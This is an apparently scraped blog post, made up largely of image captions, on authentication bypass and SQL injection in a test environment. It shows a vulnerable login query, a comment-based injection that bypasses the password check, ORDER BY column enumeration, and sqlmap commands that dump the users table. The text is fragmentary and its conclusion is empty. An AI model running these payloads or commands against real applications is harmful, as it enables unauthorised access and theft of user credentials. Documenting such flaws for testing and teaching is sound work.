Authentication Bypass and SQL Injection

A series of blogs having interesting and impactful cyber security vulnerabilities from real world assessments as well as a testing environment. Follow along!

Just a typical reverse shell and privilege escalation demo in a contained environment
I am such men
const query = 'SELECT * FROM users_table WHERE email = ${data.email} and password = ${data.pass}';
Normal Request
Psychopath’s Request
const query = 'SELECT * FROM users_table WHERE email = marty@hello.world' -- and password = something';
Just a typical authentication bypass
Order by clause with 14 columns
Order by clause with 15 columns gave me an error
union based SQLi payload
sqlmap -r request.txt --level=5 --risk=3 --ignore-code 401 --tables --batch
The list of tables in the web application’s database
sqlmap -r request.txt --level=5 --risk=3 --ignore-code 401 -T users --dump --batch
Users table dumped

Conclusion

--

--

A simple guy

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store